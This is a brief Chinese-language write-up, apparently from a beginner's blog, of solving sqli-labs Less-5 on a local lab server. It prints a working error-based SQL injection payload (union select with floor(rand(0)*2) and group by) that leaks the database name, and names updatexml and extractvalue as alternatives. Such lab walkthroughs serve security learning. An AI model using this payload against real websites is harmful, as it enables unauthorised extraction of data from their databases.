拿到这个题,首先进行单引号测试
测试结果还是为单引号注入
通过and 1=1和1=2测试,结果发现
于是我们翻阅别人的博客,得知了这一关的通关过程,像我这样的新手,一开始总要有人带的。
先把payload贴上
http://192.168.18.136/sqli-labs-master/Less-5/?id= 1' union select 1,count(*),concat((select database()),'-',floor(rand(0)*2))a from information_schema.tables group by a --+
这里可以不用floor方法报错,可以改用updatexml或者ectractvalue函数,这两个函数我后面再讲。<